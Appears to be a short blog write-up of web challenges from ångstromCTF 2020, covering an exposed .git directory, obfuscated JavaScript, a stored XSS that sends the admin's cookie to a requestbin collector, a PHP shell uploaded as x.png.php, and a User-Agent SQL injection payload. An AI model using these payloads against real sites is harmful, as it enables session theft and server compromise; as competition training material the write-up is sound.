i participated in ångstromCTF 2020 with my awesome team P1rates as python_4004 & my dude mokey . This is our writeups about some challenges we solved during the competition.
Noting the name of the challenge, I think the system is based on git management system
But I have to make sure first , so i will use dirb tool
now lets try to download git files to do that open your terminal and write git clone +the link of the challenge
git clone https://gitgood.2020.chall.actf.co/.git
The first thing I thought about was looking at the log file
the flag is :
by clicking on pay my some money it call nofret() function so let's see source code
okey i found that javascript is obfuscated. so we need to revesre this code ,i use this online platform to decode our obfuscated js file http://www.jsnice.org/
looking very well i found ohh lets delete this line and put thit function on console console ["clear"] ();
the flag is :
it was very easy challenge what you should do only open inspect and Change "give flag" to "please give flag"
the flag is :
This was an easy xss stored challenge given the following:
first i post this post <img src=x onerror='requestbin?cookie='+document.cookie>
i use requestbin to get admin cookies
i reported my post to admin , checking my requestbin i found the flag the flag is :
It’s file upload injection so lets try to upload shell In the form of a picture format
i googled and find this good article
our extention will be x.png.php
this is our shell script
using burpsuit :
the flag is:
from burpsuit i check user-agent header and try to inject it manually
After many attempts, I finally i reach to the flag
using this query a' or 1 limit 1 offset 2 -- -
the flag is :